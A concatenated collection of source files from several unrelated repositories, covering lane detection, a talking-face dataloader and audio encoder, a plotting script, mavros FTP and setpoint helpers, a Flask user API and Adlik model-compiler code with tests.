out_img = unwarp(out_img)
cv2.putText(out_img,"Radius: %0dm" %radius,(10,100),cv2.FONT_HERSHEY_SIMPLEX,2,(255,255,255),2,cv2.LINE_AA)
cv2.putText(out_img,"Vehicle is %2fm left of center" %position,(10,200),cv2.FONT_HERSHEY_SIMPLEX,2,(255,255,255),2,cv2.LINE_AA)
#TODO: Add curvature and center position
# Draw lanes on image
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
stacked = cv2.addWeighted(img, 1, out_img, 0.5, 0)
if print_stages:
cv2.imwrite(".\\output_images\\test%d_stacked.jpg" % count, cv2.cvtColor(stacked, cv2.COLOR_BGR2RGB))
return stacked
#--------------- Main ------------------------------
processVideo = True
# Do calibration (only need to do once)
images = glob.glob(r".\camera_cal\calibration*.jpg")
mtx, dist = doCalibration(images)
# Process Images
images = glob.glob(r".\test_images\test*.jpg")
images.append(r".\test_images\straight_lines1.jpg")
images.append(r".\test_images\straight_lines2.jpg")
count = 0
for img in images:
count += 1
#Undistort
img = cv2.imread(img)
undistorted = cv2.undistort(img,mtx, dist, None, mtx)
cv2.imwrite(".\\output_images\\test%d_undistorted.jpg" % count, undistorted)
print("Processing image %2d" % count, end='\r', flush=True)
processed = doLaneDetection(img,print_stages=True)
print("\nFinished Images")
# Process Video
if processVideo:
images = glob.glob(r".\render\frame*.jpg")
count = 0
for img in images:
count += 1
if count > 1252:
(print("\n# Finished #"))
break
# Undistort
img = cv2.imread(img)
img = cv2.undistort(img, mtx, dist, None, mtx)
# Process
processed = doLaneDetection(img,print_stages=False)
print("Processing frame %2d" % count, end='\r', flush=True)
cv2.imwrite(".\\render\\frameOut%05d.jpg" % count, cv2.cvtColor(processed, cv2.COLOR_BGR2RGB))
# When finished, render video
renderVideoFFMPEG()
``` |
{
"source": "JinxedQAQ/Generating-Talking-Face-with-Controllable-Eye-Movements-by-Disentangled-Blinking-Feature",
"score": 2
} |
#### File: Generating-Talking-Face-with-Controllable-Eye-Movements-by-Disentangled-Blinking-Feature/Dataloader/Test_load_audio.py
```python
from __future__ import print_function, division
import os
import torch
import numpy as np
from torch.utils.data import Dataset, DataLoader
from Options_all import BaseOptions
import cv2
def Test_Outside_Loader(path, A_path, config, require_audio=True, require_video=False):
loader = {}
data_length = config.test_audio_video_length
pair = range(2, 2 + data_length)
im_pth = []
video_block = np.zeros((config.test_audio_video_length,
config.image_size,
config.image_size,
config.image_channel_size))
mfcc_block = np.zeros(( config.test_audio_video_length, 1,
config.mfcc_length,
config.mfcc_width,
))
blinkdata_block = np.zeros((config.test_audio_video_length,
config.blinkdata_width))
crop_x = 2
crop_y = 2
A_image = cv2.imread(A_path)
A_image = cv2.cvtColor(A_image, cv2.COLOR_BGR2RGB)
A_image = A_image.astype(np.float64)
A_image = A_image / 255
A_image = cv2.resize(A_image[crop_x:crop_x + config.image_size, crop_y:crop_y + config.image_size],
(config.image_size, config.image_size))
if os.path.isdir(path):
k1 = 0
if require_video:
for image_num in pair:
image_path = os.path.join(path, str(image_num) + '.jpg')
im_pth.append(image_path)
if os.path.exists(image_path):
image = cv2.imread(image_path)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = image / 255
video_block[k1] = image[crop_x:crop_x + config.image_size, crop_y:crop_y + config.image_size]
else:
print("video_block = 0")
break
k1 += 1
if require_audio:
k4 = 0
for mfcc_num in pair:
# for s in range(-1,2):
mfcc_path = os.path.join(path, str(mfcc_num) + '.bin')
if os.path.exists(mfcc_path):
mfcc = np.fromfile(mfcc_path)
mfcc = mfcc.reshape(20, 12)
mfcc_block[k4, 0, :, :] = mfcc
k4 += 1
else:
raise ("mfccs = 0")
blinkdata_path = os.path.join(path, 'd.txt')
blinkdatas = np.loadtxt(blinkdata_path)
k3hjq = 0
for b_num in pair:
if (config.blinkdata_width-1) % 2 != 0:
print("WIDTH ERROR INIT BLINKDATA!!! Not and odd number. This may cause errors. HJQERR")
b_expand = config.blinkdata_width // 2
#print(blinkdatas[b_num - b_expand:b_num + b_expand + 1])
blinkdata_block[k3hjq] = blinkdatas[b_num - b_expand:b_num + b_expand + 1]
k3hjq += 1
video_block = video_block.transpose((0, 3, 1, 2))
A_image = A_image.transpose((2, 0, 1))
loader['A'] = A_image
if require_video:
loader['B'] = video_block
loader['B_audio'] = mfcc_block
loader['A_path'] = A_path
loader['B_path'] = im_pth
loader['blinkdata'] = blinkdata_block
return loader
class Test_VideoFolder(Dataset):
def __init__(self, root, A_path, config, transform=None, target_transform=None,
loader=Test_Outside_Loader, mode='test'):
self.root = root
self.A_path = A_path
self.transform = transform
self.target_transform = target_transform
self.loader = loader
self.config = config
self.mode = mode
self.vid = self.loader(self.root, self.A_path, config=self.config)
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is class_index of the target class.
"""
loader = {}
loader['A'] = self.vid['A']
loader['B_audio'] = self.vid['B_audio'][index:self.config.sequence_length + index, :, :, :]
loader['A_path'] = self.A_path
loader['blinkdata'] = self.vid['blinkdata'][index:self.config.sequence_length + index, :]
return loader
def __len__(self):
return self.config.test_audio_video_length - self.config.sequence_length + 1
```
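For orientation, a hedged usage sketch of the loader above (not part of the repository): the paths are placeholders, and it assumes `BaseOptions` exposes a `parse()` method that returns the config object used throughout.
```python
# Illustrative only: directory layout (2.jpg/2.bin ... plus d.txt) and option API are assumptions.
from torch.utils.data import DataLoader
from Options_all import BaseOptions
from Dataloader.Test_load_audio import Test_VideoFolder

config = BaseOptions().parse()          # assumed entry point of the option class
dataset = Test_VideoFolder(root='./data/sample_clip',
                           A_path='./data/identity.jpg',
                           config=config)
loader = DataLoader(dataset, batch_size=1, shuffle=False)

for batch in loader:
    # keys follow __getitem__ above: 'A', 'B_audio', 'A_path', 'blinkdata'
    print(batch['A'].shape, batch['B_audio'].shape, batch['blinkdata'].shape)
    break
```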
#### File: Generating-Talking-Face-with-Controllable-Eye-Movements-by-Disentangled-Blinking-Feature/network/mfcc_networks.py
```python
from __future__ import print_function, division
import torch
import torch.nn as nn
class mfcc_encoder(nn.Module):
def __init__(self, norm_layer=nn.BatchNorm2d):
super(mfcc_encoder, self).__init__()
use_bias = norm_layer == nn.InstanceNorm2d
self.relu = nn.LeakyReLU(0.2, True)
self.conv1 = nn.Conv2d(1, 64, kernel_size=(3, 3),
stride=(3, 2), padding=(1, 2), bias=use_bias)
self.pool1 = nn.AvgPool2d((2, 2), 2)
self.bn1 = norm_layer(64)
self.conv2 = nn.Conv2d(64, 128, (3, 3), 2, 1, bias=use_bias)
self.pool2 = nn.AvgPool2d(2,2)
self.bn2 = norm_layer(128)
self.conv3 = nn.Conv2d(128, 256, (3, 3), 1, 0, bias=use_bias)
self.bn3 = norm_layer(256)
self.conv4 = nn.Conv2d(256, 512, (2, 2), 1, bias=use_bias)
self.bn5 = norm_layer(512)
self.tanh = nn.Tanh()
def forward(self, x):
net1 = self.conv1(x)
net1 = self.bn1(net1)
net1 = self.relu(net1)
net = self.conv2(net1)
net = self.bn2(net)
net = self.relu(net)
net = self.conv3(net)
net = self.bn3(net)
net = self.relu(net)
net = self.conv4(net)
return net
class mfcc_encoder_alter(nn.Module):
def __init__(self):
super(mfcc_encoder_alter, self).__init__()
self.relu = nn.LeakyReLU(0.2, True)
self.conv1 = nn.Conv2d(1, 64, kernel_size=(3, 12), stride=(1,1), padding=0, bias=False)
self.bn1 = nn.BatchNorm1d(64)
self.pool1 = nn.MaxPool2d(1, 3)
self.conv2 = nn.Conv2d(64, 256, (3, 1), 1, (1, 0), bias=False)
self.bn2 = nn.BatchNorm2d(256)
self.pool2 = nn.MaxPool2d(1, 2)
self.conv3 = nn.Conv2d(256, 512, (3, 1), 1, bias=False)
def forward(self, x):
net = self.conv1(x)
net = self.relu(self.bn1(net))
net = self.pool1(net)
net = self.conv2(net)
net = self.relu(self.bn2(net))
net = self.pool2(net)
net = self.conv3(net)
return net
class mfcc_encoder_two(nn.Module):
def __init__(self, opt):
super(mfcc_encoder_two, self).__init__()
self.opt = opt
self.model1 = mfcc_encoder()
self.model2 = mfcc_encoder_alter()
self.fc = nn.Linear(1024, 256)
def _forward(self, x):
net1 = self.model1.forward(x)
net2 = self.model2.forward(x)
net = torch.cat((net1, net2), 1)
net = net.view(-1, 1024)
net = self.fc(net)
return net
def forward(self, x):
x0 = x.view(-1, 1, self.opt.mfcc_length, self.opt.mfcc_width)
net = self._forward(x0)
net = net.view(x.size(0), -1, 256)
return net
``` |
{
"source": "JINXER000/FIESTA",
"score": 3
} |
#### File: FIESTA/launch/plottest.py
```python
import matplotlib.pyplot as plt;
import numpy as np;
import scipy.optimize as opt;
# This is the function we are trying to fit to the data.
def func(x, a, b, c):
return a * np.exp(-b * x) + c
def f_1(x, A, B):
return A * x + B
# Generate some data, you don't have to do this, as you already have your data
# xdata = np.linspace(0, 4, 50)
# y = func(xdata, 2.5, 1.3, 0.5)
# y_noise = 0.2 * np.random.normal(size=xdata.size)
# ydata = y + y_noise
xdata = np.array([16159.2, 17334.2, 16251.4, 22609, 1.38982e+06, 2.00012e+06, 5.02172e+06, 3.61781e+06, 4.3934e+06, 4.81698e+06, 5.81111e+06, 6.67861e+06, 7.482e+06, 9.93535e+06, 1.09539e+07, 1.26584e+07, 1.35077e+07])/7500000
ydata = [4, 5, 5, 4, 4, 5, 5, 5, 5, 5, 6, 6, 6, 6, 7, 7, 7]
# Plot the actual data
plt.plot(xdata, ydata, ".")
x2 = np.array([2758.06, 2955.63, 18154.9, 18190, 15085.7, 1.20055e+06, 864335, 1.84234e+06, 4.87904e+06, 5.29839e+06, 6.7315e+06, 7.61749e+06, 9.17301e+06, 9.87764e+06, 1.11146e+07, 1.25104e+07, 1.37528e+07])/7500000
y2 = [1, 1, 2, 3, 36, 85, 97, 102, 88, 98, 119, 98, 123, 126, 132, 144, 137]
plt.plot(x2, y2, ".", color="g")
# The actual curve fitting happens here
optimizedParameters, pcov = opt.curve_fit(f_1, xdata, ydata)
# Use the optimized parameters to plot the best fit
plt.plot(xdata, f_1(xdata, *optimizedParameters), label="ours")
optimizedParameters2, pcov2 = opt.curve_fit(f_1, x2, y2)
# Use the optimized parameters to plot the best fit
plt.plot(x2, f_1(x2, *optimizedParameters2), label="FIESTA")
plt.title('Mapping speed vs. Environmental change')
plt.xlabel('Environmental change score')
plt.ylabel('ESDF construction time (ms)')
plt.legend()
# Show the graph
plt.savefig("changerate.pdf")
plt.show()
``` |
{
"source": "JINXER000/FundamentalSimulatorPX4",
"score": 2
} |
#### File: src/mavros/ftp.py
```python
__all__ = (
'FTPFile',
'open',
'listdir',
'unlink',
'mkdir',
'rmdir',
'rename',
'checksum',
'reset_server'
)
import os
import rospy
import mavros
from std_srvs.srv import Empty
from mavros_msgs.msg import FileEntry
from mavros_msgs.srv import FileOpen, FileClose, FileRead, FileList, FileOpenRequest, \
FileMakeDir, FileRemoveDir, FileRemove, FileWrite, FileTruncate, FileRename, \
FileChecksum
def _get_proxy(service, type):
return rospy.ServiceProxy(mavros.get_topic('ftp', service), type)
def _check_raise_errno(ret):
if not ret.success:
raise IOError(ret.r_errno, os.strerror(ret.r_errno))
class FTPFile(object):
"""
FCU file object.
Note that current PX4 firmware only supports two connections simultaneously.
"""
def __init__(self, name, mode):
self.name = None
self.mode = mode
self.open(name, mode)
def __del__(self):
self.close()
def open(self, path, mode):
"""
Supported modes:
- 'w': write binary
- 'r': read binary
- 'cw': create excl & write
"""
if mode == 'w' or mode == 'wb':
m = FileOpenRequest.MODE_WRITE
elif mode == 'r' or mode == 'rb':
m = FileOpenRequest.MODE_READ
elif mode == 'cw':
m = FileOpenRequest.MODE_CREATE
else:
raise ValueError("Unknown open mode: {}".format(m))
open_ = _get_proxy('open', FileOpen)
try:
ret = open_(file_path=path, mode=m)
except rospy.ServiceException as ex:
raise IOError(str(ex))
_check_raise_errno(ret)
self._read = _get_proxy('read', FileRead)
self._write = _get_proxy('write', FileWrite)
self.name = path
self.mode = mode
self.size = ret.size
self.offset = 0
def close(self):
if self.closed:
return
close_ = _get_proxy('close', FileClose)
try:
ret = close_(file_path=self.name)
except rospy.ServiceException as ex:
raise IOError(str(ex))
self.name = None
_check_raise_errno(ret)
def read(self, size=1):
try:
ret = self._read(file_path=self.name, offset=self.offset, size=size)
except rospy.ServiceException as ex:
raise IOError(str(ex))
_check_raise_errno(ret)
self.offset += len(ret.data)
return bytearray(ret.data)
def write(self, bin_data):
data_len = len(bin_data)
try:
ret = self._write(file_path=self.name, offset=self.offset, data=bin_data)
except rospy.ServiceException as ex:
raise IOError(str(ex))
_check_raise_errno(ret)
self.offset += data_len
if self.offset > self.size:
self.size = self.offset
def tell(self):
return self.offset
def seek(self, offset, whence=os.SEEK_SET):
if whence is os.SEEK_SET:
self.offset = offset
elif whence is os.SEEK_END:
self.offset = offset + self.size
elif whence is os.SEEK_CUR:
self.offset += offset
else:
raise ValueError("Unknown whence")
def truncate(self, size=0):
truncate_ = _get_proxy('truncate', FileTruncate)
try:
ret = truncate_(file_path=self.name, length=size)
except rospy.ServiceException as ex:
raise IOError(str(ex))
_check_raise_errno(ret)
@property
def closed(self):
return self.name is None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def open(path, mode):
"""Open file on FCU"""
return FTPFile(path, mode)
def listdir(path):
"""List directory :path: contents"""
try:
list_ = _get_proxy('list', FileList)
ret = list_(dir_path=path)
except rospy.ServiceException as ex:
raise IOError(str(ex))
_check_raise_errno(ret)
return ret.list
def unlink(path):
"""Remove :path: file"""
remove = _get_proxy('remove', FileRemove)
try:
ret = remove(file_path=path)
except rospy.ServiceException as ex:
raise IOError(str(ex))
_check_raise_errno(ret)
def mkdir(path):
"""Create directory :path:"""
mkdir_ = _get_proxy('mkdir', FileMakeDir)
try:
ret = mkdir_(dir_path=path)
except rospy.ServiceException as ex:
raise IOError(str(ex))
_check_raise_errno(ret)
def rmdir(path):
"""Remove directory :path:"""
rmdir_ = _get_proxy('rmdir', FileRemoveDir)
try:
ret = rmdir_(dir_path=path)
except rospy.ServiceException as ex:
raise IOError(str(ex))
_check_raise_errno(ret)
def rename(old_path, new_path):
"""Rename :old_path: to :new_path:"""
rename_ = _get_proxy('rename', FileRename)
try:
ret = rename_(old_path=old_path, new_path=new_path)
except rospy.ServiceException as ex:
raise IOError(str(ex))
_check_raise_errno(ret)
def checksum(path):
"""Calculate CRC32 for :path:"""
checksum_ = _get_proxy('checksum', FileChecksum)
try:
ret = checksum_(file_path=path)
except rospy.ServiceException as ex:
raise IOError(str(ex))
_check_raise_errno(ret)
return ret.crc32
def reset_server():
reset = _get_proxy('reset', Empty)
try:
reset()
except rospy.ServiceException as ex:
raise IOError(str(ex))
```
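A hedged usage sketch of the module above (not from the source): it assumes a running mavros node, that `mavros.set_namespace()` has been called, and the SD-card path is only an example.
```python
# Illustrative only: node name and FCU paths are placeholders.
import rospy
import mavros
from mavros import ftp

rospy.init_node('ftp_example')
mavros.set_namespace()                      # defaults to the 'mavros' namespace

# create-and-write, then read back
with ftp.open('/fs/microsd/hello.txt', 'cw') as fd:
    fd.write(bytearray(b'hello'))

with ftp.open('/fs/microsd/hello.txt', 'r') as fd:
    print(fd.read(fd.size))

# listdir() returns mavros_msgs/FileEntry messages
for entry in ftp.listdir('/fs/microsd'):
    print(entry.name, entry.size)
```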
#### File: src/mavros/setpoint.py
```python
import rospy
import mavros
from std_msgs.msg import Header, Float64
from geometry_msgs.msg import TwistStamped, PoseStamped, PoseWithCovarianceStamped, \
Vector3, Vector3Stamped, Point, Quaternion
def get_pub_accel_accel(**kvargs):
"""
Returns publisher for :setpoint_accel: plugin, :accel: topic
"""
return rospy.Publisher(mavros.get_topic('setpoint_accel', 'accel'), Vector3Stamped, **kvargs)
def get_pub_attitude_cmd_vel(**kvargs):
"""
Returns publisher for :setpoint_attitude: plugin, :cmd_vel: topic
"""
return rospy.Publisher(mavros.get_topic('setpoint_attitude', 'cmd_vel'), PoseStamped, **kvargs)
def get_pub_attitude_throttle(**kvargs):
"""
Returns publisher for :setpoint_attitude: plugin, :att_throttle: topic
"""
return rospy.Publisher(mavros.get_topic('setpoint_attitude', 'att_throttle'), Float64, **kvargs)
def get_pub_attitude_pose(**kvargs):
"""
Returns publisher for :setpoint_attitude: plugin, :attitude: topic
"""
return rospy.Publisher(mavros.get_topic('setpoint_attitude', 'attitude'), PoseStamped, **kvargs)
def get_pub_attitude_posecov(**kvargs):
"""
Returns publisher for :setpoint_attitude: plugin, :attitude: topic (with covariance)
"""
raise DeprecationWarning("PoseWithCovarianceStamped subscriber removed.")
def get_pub_position_local(**kvargs):
"""
Returns publisher for :setpoint_position: plugin, :local: topic
"""
return rospy.Publisher(mavros.get_topic('setpoint_position', 'local'), PoseStamped, **kvargs)
def get_pub_velocity_cmd_vel(**kvargs):
"""
Returns publisher for :setpoint_velocity: plugin, :cmd_vel: topic
"""
return rospy.Publisher(mavros.get_topic('setpoint_velocity', 'cmd_vel'), TwistStamped, **kvargs)
``` |
{
"source": "Jinxes/pipe",
"score": 2
} |
#### File: session/api/signout.py
```python
from flask.views import View
from flask import Response, request, jsonify
from flask_cors import cross_origin
class Controller(View):
methods = ['DELETE']
@cross_origin()
def dispatch_request(self):
return Response(status=205)
```
#### File: user/api/addition.py
```python
from flask.views import View
from flask import request, jsonify
from ports.user.service.user import UserService
from ports.user.service.auth import AuthService
from ports.user.model.user_form import UserForm
from ports.user.model.info_form import InfoForm
from flask_jwt import current_identity, jwt_required
from boot.jwt_util import jwt_optional
from flask_apispec import use_kwargs, marshal_with
from ports.user.user_schema import user_schema
from werkzeug.datastructures import MultiDict
class Controller(View):
methods = ['POST']
def __init__(self):
self.userService = UserService()
self.authService = AuthService()
@jwt_optional()
def dispatch_request(self):
user_form = UserForm(MultiDict(request.json))
if user_form.validate():
user = user_form.create()
if user:
info_form = InfoForm()
info = info_form.init(user.id)
if info:
token = self.authService.make_auth_token(user)
return jsonify(dict(token=token.decode())), 201
return jsonify({'errors': {'_system': 'system busy1'}}), 500
else:
return jsonify({'errors': {'_system': 'system busy2'}}), 500
else:
return jsonify({'errors': user_form.errors}), 422
```
#### File: user/api/repemail.py
```python
from flask import request, Response
from flask.views import View
from ports.user.service.user import UserService
from flask_jwt import current_identity, jwt_required
class Controller(View):
methods = ['GET']
def __init__(self):
self.userService = UserService()
@jwt_required()
def dispatch_request(self):
user = self.userService.findByEmail(request.args.get('email', None))
if user:
if user.id != current_identity.id:
return Response(status=200)
return Response(status=404)
```
#### File: user/model/info.py
```python
from boot.extensions import db
from flask import current_app
from datetime import datetime
from sqlalchemy.dialects.mysql import INTEGER, VARCHAR, TINYINT, DATETIME, TEXT
class UserInfo(db.Model):
id = db.Column(INTEGER(unsigned=True), primary_key=True)
sign = db.Column(TEXT(), nullable=False, default='')
intro = db.Column(TEXT(), nullable=False, default='')
address = db.Column(VARCHAR(length=255), nullable=False, default='')
birthday = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
avatar = db.Column(VARCHAR(length=255), nullable=False, default='')
state = db.Column(TINYINT(), nullable=False, default=1)
user_id = db.Column(INTEGER(unsigned=True), db.ForeignKey('user.id'), nullable=False)
def __str__(self):
return '<UserInfo {0}>'.format(self.user.id)
```
#### File: user/model/user.py
```python
from flask import current_app
from boot.extensions import db
from datetime import datetime
from sqlalchemy.dialects.mysql import INTEGER, VARCHAR, TINYINT, DATETIME
from .info import UserInfo
from ports.blog.model.blog import Blog
class User(db.Model):
id = db.Column(INTEGER(unsigned=True), primary_key=True)
email = db.Column(VARCHAR(length=128), unique=True, nullable=False)
nickname = db.Column(VARCHAR(length=128), nullable=False)
password = db.Column(VARCHAR(length=255), nullable=False)
gender = db.Column(TINYINT(), nullable=False, default=0)
state = db.Column(TINYINT(), nullable=False, default=1)
active = db.Column(TINYINT(), nullable=False, default=0)
manager = db.Column(TINYINT(), nullable=False, default=0)
create_time = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
info = db.relationship(UserInfo, uselist=False, backref='user', lazy=True)
blogs = db.relationship(Blog, uselist=True, backref='user', lazy=True)
def __str__(self):
return '<User {0}>'.format(self.id)
```
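A hedged sketch of how the two models above are typically created together (not from the source): it assumes an active Flask application context and that `db` is the SQLAlchemy handle these models are bound to; password hashing is left to the caller.
```python
# Illustrative only: run inside an application context, e.g. `with app.app_context():`
from boot.extensions import db
from ports.user.model.user import User
from ports.user.model.info import UserInfo

user = User(email='alice@example.com', nickname='alice', password='hashed-password-here')
db.session.add(user)
db.session.flush()                 # populates user.id for the foreign key below

info = UserInfo(user_id=user.id)   # remaining columns fall back to their defaults
db.session.add(info)
db.session.commit()
```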
#### File: user/service/user.py
```python
from boot.singleton import singleton
from ports.user.model.user import User
@singleton
class UserService:
STATE_ON = 1
STATE_OFF = 0
_curent_user = None
def email_exist(self, email):
'''
Check whether the email address is already in use.
:param email: string
:return: bool
'''
num = User.query.filter_by(email=email).count()
return True if num > 0 else False
def findById(self, id):
'''
Look up a single user by id.
:param id: User.id
:return: User
'''
user = User.query.filter_by(id=id, state=self.STATE_ON).first()
return user
def findByEmail(self, email):
'''
Look up a single user by email.
:param email: User.email
:return: User
'''
user = User.query.filter_by(email=email, state=self.STATE_ON).first()
return user
def set_curent_user(self, user):
'''
Set the current user.
:param user: User
:return: None
'''
self._curent_user = user
def get_curent_user(self):
'''
Look up the user identified by the current token.
The authorization.dependent closure must be called beforehand,
or the current user must be set via self.set_curent_user.
:return: User
'''
return self._curent_user
``` |
{
"source": "JinXiaozhao/Adlik",
"score": 2
} |
#### File: model_compiler/models/data_type.py
```python
import enum
from enum import Enum
from onnx import TensorProto as OnnxTensorProto
from tensorflow.core.framework.types_pb2 import DataType as TfDataType # pylint: disable=no-name-in-module
_ONNX_DATA_TYPE = OnnxTensorProto.DataType # pylint: disable=no-member
class DataType(Enum):
# Boolean values.
BOOL = enum.auto()
# Integer values.
INT8 = enum.auto()
UINT8 = enum.auto()
INT16 = enum.auto()
UINT16 = enum.auto()
INT32 = enum.auto()
UINT32 = enum.auto()
INT64 = enum.auto()
UINT64 = enum.auto()
# Floating number values.
FLOAT16 = enum.auto()
BFLOAT16 = enum.auto()
FLOAT = enum.auto()
DOUBLE = enum.auto()
# Complex values.
COMPLEX64 = enum.auto()
COMPLEX128 = enum.auto()
# String values.
STRING = enum.auto()
@staticmethod
def from_tf_data_type(data_type: int):
if data_type == TfDataType.DT_HALF:
return DataType.FLOAT16
return DataType[TfDataType.Name(data_type)[len('DT_'):]]
def to_tf_data_type(self) -> int:
if self == DataType.FLOAT16:
return TfDataType.DT_HALF
return TfDataType.Value(f'DT_{self.name}')
@staticmethod
def from_onnx_data_type(data_type: int):
return DataType[_ONNX_DATA_TYPE.Name(data_type)]
def to_onnx_data_type(self) -> int:
return _ONNX_DATA_TYPE.Value(self.name)
@staticmethod
def from_tensorrt_data_type(data_type):
import tensorrt # pylint: disable=import-outside-toplevel
if data_type == tensorrt.DataType.HALF:
return DataType.FLOAT16
return DataType[data_type.name]
def to_tensorrt_data_type(self):
import tensorrt # pylint: disable=import-outside-toplevel
if self == DataType.FLOAT16:
return tensorrt.DataType.HALF
return getattr(tensorrt.DataType, self.name)
@staticmethod
def from_openvino_data_type(data_type):
precision_map = {
'FP32': DataType.FLOAT,
'FP16': DataType.FLOAT16,
'I64': DataType.INT64,
'I32': DataType.INT32,
'I8': DataType.INT8,
'U8': DataType.UINT8,
'U1': DataType.UINT8,
'BOOL': DataType.BOOL,
'BIN': DataType.UINT8,
}
return precision_map[data_type]
@staticmethod
def from_caffe_data_type(type_str):
return DataType[type_str.upper()]
@staticmethod
def from_torch_data_type(type_str):
import torch # pylint: disable=import-outside-toplevel
torch_data_type_map = {
'FLOAT': torch.float,
'DOUBLE': torch.double,
'COMPLEX64': torch.complex64,
'COMPLEX128': torch.complex128,
'FLOAT16': torch.float16,
'BFLOAT16': torch.bfloat16,
'UINT8': torch.uint8,
'INT8': torch.int8,
'INT16': torch.int16,
'INT32': torch.int32,
'INT64': torch.int64,
'BOOL': torch.bool
}
return torch_data_type_map[type_str.upper()]
```
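A small usage sketch based on the conversion methods above (the import path mirrors the file location and is otherwise an assumption; onnx and tensorflow must be installed since the module imports them):
```python
from model_compiler.models.data_type import DataType

# ONNX round trip
onnx_code = DataType.FLOAT.to_onnx_data_type()
assert DataType.from_onnx_data_type(onnx_code) == DataType.FLOAT

# TensorFlow round trip; FLOAT16 is the special case mapped to DT_HALF
tf_code = DataType.FLOAT16.to_tf_data_type()
assert DataType.from_tf_data_type(tf_code) == DataType.FLOAT16

# OpenVINO precision strings map onto the same enum
assert DataType.from_openvino_data_type('FP16') == DataType.FLOAT16
```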
#### File: model_compiler/tvm_utils/__init__.py
```python
from .schedule_search_x86 import CpuSearch
class Compiler:
def __init__(self, relay_mod, params, input_shape) -> None:
self.mod = relay_mod
self.params = params
self.input_shape = input_shape
self.strategy = None
self.schedule_file = None
def set_strategy(self, strategy):
self.strategy = strategy
def search_schedule(self):
self.schedule_file = self.strategy.search(self.mod, self.params, self.input_shape)
def compile(self):
return self.strategy.compile(self.mod, self.params, self.schedule_file)
def compile_relay(model, params, config, shape_dict):
compiler = Compiler(model, params, shape_dict)
if config.target.startswith('llvm'):
compiler.set_strategy(CpuSearch(config.target))
elif config.target == 'arm-cpu':
raise NotImplementedError('Arm compile not supported yet')
elif config.target == 'cuda':
raise NotImplementedError('CUDA compile not supported yet')
else:
raise NameError(f'Unsupported target name: "{config.target}"')
if config.need_search_schedule:
compiler.search_schedule()
return compiler.compile()
```
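A hedged sketch of driving `compile_relay` (not from the source): the frontend call is left as a comment because it needs a concrete model, and the config object here is a stand-in for the package's real configuration class.
```python
# Illustrative only: `mod`/`params` would come from a TVM relay frontend.
from model_compiler.tvm_utils import compile_relay

shape_dict = {'data': (1, 3, 224, 224)}
# from tvm import relay
# mod, params = relay.frontend.from_onnx(onnx_model, shape_dict)


class DummyConfig:
    """Stand-in exposing only the attributes compile_relay reads."""
    target = 'llvm'
    need_search_schedule = False


# graph_module = compile_relay(mod, params, DummyConfig(), shape_dict)
```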
#### File: model_compiler/compilers/test_paddle_model_file_to_onnx_model.py
```python
from tempfile import TemporaryDirectory
from unittest import TestCase
import os
import numpy as np
import paddle
import paddle.nn as nn
import paddle.optimizer as opt
from paddle.static import InputSpec
import model_compiler.compilers.paddle_model_file_to_onnx_model as compiler
from model_compiler.compilers.paddle_model_file_to_onnx_model import Config, DataFormat
from model_compiler.models.sources.paddle_model_file import PaddlePaddleModelFile
class _RandomDataset(paddle.io.Dataset):
def __init__(self, num_samples): # pylint: disable=super-init-not-called
self.num_samples = num_samples
def __getitem__(self, idx):
image = np.random.random([784]).astype('float32') # pylint: disable=no-member
label = np.random.randint(0, 9, (1,)).astype('int64')
return image, label
def __len__(self):
return self.num_samples
class _LinearNet(nn.Layer):
def __init__(self):
super().__init__()
self._linear = nn.Linear(784, 10)
def forward(self, inputs): # pylint: disable=arguments-differ
return self._linear(inputs)
class ConfigTestCase(TestCase):
def test_from_json(self):
self.assertEqual(Config.from_json({'input_formats': ['channels_first'],
'model_filename': 'model',
'params_filename': 'params',
'opset_version': 9,
'enable_onnx_checker': True}),
Config(input_formats=[DataFormat.CHANNELS_FIRST],
model_filename='model',
params_filename='params',
opset_version=9,
enable_onnx_checker=True))
def test_from_env(self):
self.assertEqual(Config.from_env({'INPUT_FORMATS': 'channels_last',
'MODEL_FILENAME': None,
'PARAMS_FILENAME': None,
'OPSET_VERSION': 9,
'ENABLE_ONNX_CHECKER': True}),
Config(input_formats=[DataFormat.CHANNELS_LAST],
model_filename=None,
params_filename=None,
opset_version=9,
enable_onnx_checker=True))
def get_paddle_model(model_path):
def train(layer, loader, loss_fn, optimizer):
for _ in range(1):
for _, (image, label) in enumerate(loader()):
out = layer(image)
loss = loss_fn(out, label)
loss.backward()
optimizer.step()
optimizer.clear_grad()
model_layer = _LinearNet()
loss_func = nn.CrossEntropyLoss()
adam = opt.Adam(learning_rate=0.001, parameters=model_layer.parameters())
dataset = _RandomDataset(64)
data_loader = paddle.io.DataLoader(dataset,
batch_size=16,
shuffle=True,
drop_last=True,
num_workers=2)
train(model_layer, data_loader, loss_func, adam)
paddle.jit.save(
layer=model_layer,
path=os.path.join(model_path, 'model'),
input_spec=[InputSpec(shape=[None, 784], dtype='float32')])
class CompileSourceTestCase(TestCase):
def test_compile(self):
with TemporaryDirectory() as model_dir:
get_paddle_model(model_dir)
compiled = compiler.compile_source(PaddlePaddleModelFile(model_dir),
Config(input_formats=[DataFormat.CHANNELS_LAST],
model_filename=os.path.join(model_dir, 'model.pdmodel'),
params_filename=os.path.join(model_dir, 'model.pdiparams'),
opset_version=10,
enable_onnx_checker=True))
graph = compiled.model_proto.graph
initializers = {initializer.name for initializer in graph.initializer}
input_name = [input_spec.name for input_spec in graph.input if input_spec.name not in initializers]
self.assertEqual(input_name, ['inputs'])
self.assertEqual(compiled.input_data_formats, [DataFormat.CHANNELS_LAST])
```
#### File: models/sources/test_mxnet_model_file.py
```python
from unittest import TestCase
from model_compiler.models.sources.mxnet_model_file import MxnetModelFile
class ONNXModelFileTestCase(TestCase):
def test_from_json_minimal(self):
config = MxnetModelFile.from_json({'input_model': 'foo'})
self.assertEqual(config.model_path, 'foo')
def test_from_env(self):
config = MxnetModelFile.from_env({'MXNET_PATH': 'model'})
self.assertEqual(config.model_path, 'model')
``` |
{
"source": "jinxia-shanbay-group/shanbay-api",
"score": 3
} |
#### File: shanbay-api/shanbay/people.py
```python
from .common import *
class People:
def __init__(self):
...
@property
def name(self):
"""昵称"""
...
return
def avator(self):
"""头像地址"""
...
def readbooks(self):
"""扇贝读书"""
...
def stats(self):
"""成长曲线"""
...
def checkin(self):
"""打卡记录"""
...
```
